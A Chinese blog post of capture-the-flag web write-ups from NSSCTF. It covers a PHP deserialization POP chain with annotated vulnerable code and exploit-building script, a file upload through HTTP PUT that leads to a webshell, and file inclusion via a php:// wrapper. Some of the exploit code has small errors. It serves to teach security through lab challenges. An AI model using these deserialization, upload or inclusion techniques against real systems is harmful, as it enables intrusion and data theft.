nssctf (1)

最新推荐文章于 2023-10-07 23:00:48 发布
最新推荐文章于 2023-10-07 23:00:48 发布
阅读量586 收藏 1
点赞数 1
分类专栏: nssctf web 进阶 文章标签: php web安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/130492671
版权

[NISACTF 2022]popchains

 

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){     #通过get获取wish的值 并判断是不是空
    @unserialize($_GET['wish']);  #反序列化wish
}
else{
    $a=new Road_is_Long;   #实例化Road_is_Long
    highlight_file(__FILE__);  #将当前页面的代码显示到页面
}
/***************************pop your 2022*****************************/

class Road_is_Long{   #定义一个名为Road_is_Long的类
    public $page;     #定义一个名为page的变量
    public $string;      #定义一个名为string的变量
    public function __construct($file='index.php'){      #定义__construct魔术方法 初始化使用
        $this->page = $file;                              #这里初始化page的值为index.php
    }
    public function __toString(){                         #toString方法 当一个对象被当作字符串使用时调用
        return $this->string->page;                       # return代表 $this->string->page以字符串  
    } 

    public function __wakeup(){                           # wakeup魔术方法 反序列化时最先调用 
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {    #对page过滤 
            echo "You can Not Enter 2022";
            $this->page = "index.php";                      #重新对page赋值
        }
    }
}

class Try_Work_Hard{            #定义一个名为Try_Work_Hard的类
    protected  $var;             #定义一个名为var的变量
    public function append($value){             #append方法 包含value变量
        include($value);                        #包含value
    }
    public function __invoke(){                 #invoke魔术方法 当脚本尝试将对象调用为函数时触发
        $this->append($this->var);              #__invoke方法调用append方法并将$this->var作为参数传给value
}

class Make_a_Change{        #定义一个名为Make_a_Change的类
    public $effort;           #定义一个名为effort的变量
    public function __construct(){            #__construct魔术方法 初始化使用
        $this->effort = array();              #初始化effor属性为空数组
    }

    public function __get($key){            #get魔术方法读取不可访问的属性的值时会被调用
        $function = $this->effort;          #将$this->effort赋值给function
        return $function();                 #返回function 同时function以函数执行
    }
}
/**********************Try to See flag.php*****************************/

先找出口 很明显时 通过include 所以是append方法

寻找调用append方法的地方发现__invoke魔术方法 

那调用__invoke方法当脚本尝试将对象调用为函数时触发

寻找触发invoke的地方 发现 __get中function以函数执行

get魔术方法读取不可访问的属性的值时会被调用

寻找读取不可访问的属性的地方_toString 中$this->string->page 这里没有page这个属性的定义

这里的page和$page是不同的 前者代表是string变量中的page属性 而后者是一个变量

toString方法 当一个对象被当作字符串使用时调用

  __wakeup中preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page里面匹配了$this->page而这里的$this->page是以字符串的形式会调用toString

wakeup在 反序列化时就会触发

调用思路
append         -->  invoke          --> get             --> toString        --> wakeup
Try_Work_Hard  -->  Try_Work_Hard   --> Make_a_Change   --> Road_is_long    --> Road_is_long

<?php
class Road_is_long{
    public $page;
    public $string;

}
class Try_Work_Hard{
    protected $var="/flag";  定义var的值 包含flag

}

class Make_a_Change{
    public $effort;

}


$A = new Road_is_long();
$A->page = new Road_is_long();
$A->page->string = new Make_a_Change();
$A->page->string->effort = new Try_Work_Hard();

$exp1 = serialize($A);
echo $exp1


 
$exp = serialize($a1);
echo urlencode($exp);





?>

 [NSSRound#1 Basic]basic_check

 这里要了解nikto的使用 

+OSVDB-397:HTTP方法“PUT”允许客户端在web服务器上保存文件

得到可以put 

然后知道put请求可以给服务器发送文件

我们给服务器发送一个为a,php的文件

这里代表执行get到的1的参数

然后我们到a.php中去

这里cat / 不会有返回值 我们要f*匹配 或者传入一句话木马再连接

[SWPUCTF 2022 新生赛]ez_ez_php

 

<?php
error_reporting(0);        #屏蔽报错信息
if (isset($_GET['file'])) {  #判断get传入的file是不是为空
    if ( substr($_GET["file"], 0, 3) === "php" ) {    #通过substr对file进行截断判断是不是php
        echo "Nice!!!";
        include($_GET["file"]);        #包含文件
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);        #高亮显示当前文件的代码
}
//flag.php                        #提示flag在flag.php中

这里要我们传入的file的开头时php 我们想到php伪协议的开头也是php 所以通过php伪协议读取

 

发现这个flag不对

他说flag在flag里面我们尝试访问flag

 

 

 

 

许允er
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nssctf文件test
03-30
1
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[NISACTF 2022]下
qq_62046696的博客
07-30 2343
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 4348
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
pop构造链表(细节)
qq_62046696的博客
07-13 377
现在学的是如何构造链表,找链子,要找链子魔术方法一定要特别清楚 首先,先找起点和终点,终点一般都是一些执行函数比如eval,看见了include(flag.php)终点确定,起点就是 _destruct看了一圈发现了w33m类中的__toString()中有个函数调用而且类名和函数名都是变量,那么这个__toString() 就和Getflag()连接起来了,再向前推,触发__toString()的条件是当一个对象被当作字符串处理,一看便看到了w22m中__destruct()w22m-->>dest
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 2005
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
[NISACTF 2022]popchains
kuzemax的博客
05-01 219
【代码】[NISACTF 2022]popchains
[NISACTF 2022]popchains - 反序列化+伪协议
最新发布
oZuoShen123的博客
10-07 1436
链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
解:[NISACTF 2022]popchains--TLS_预备队任务(1)
river_mouth_man的博客
03-08 601
php反序列化,构造pop链
NSSCTF web题记录
m0_64815693的博客
11-08 9546
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSS [NISACTF 2022]popchains
Jay17的博客
04-12 237
NSS [NISACTF 2022]popchains
[SWPUCTF 2021 新生赛]traditional
03-15
1. 古典密码:八卦图密码是一种古典密码,它使用阳爻和阴爻来表示二进制数字。 2. 二进制数学:二进制数学是计算机的基础,它可以用来加密和解密信息。 3. 八卦图:八卦图是中国古典哲学中的一个概念,它可以用来...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
NSSCTF web刷题
akxnxbshai的博客
08-15 2924
闲来无聊写一写NSSCTF
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4655
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
[NISACTF 2022]
snowlyzz的博客
09-09 5937
NISACTF部分WP
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1328
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值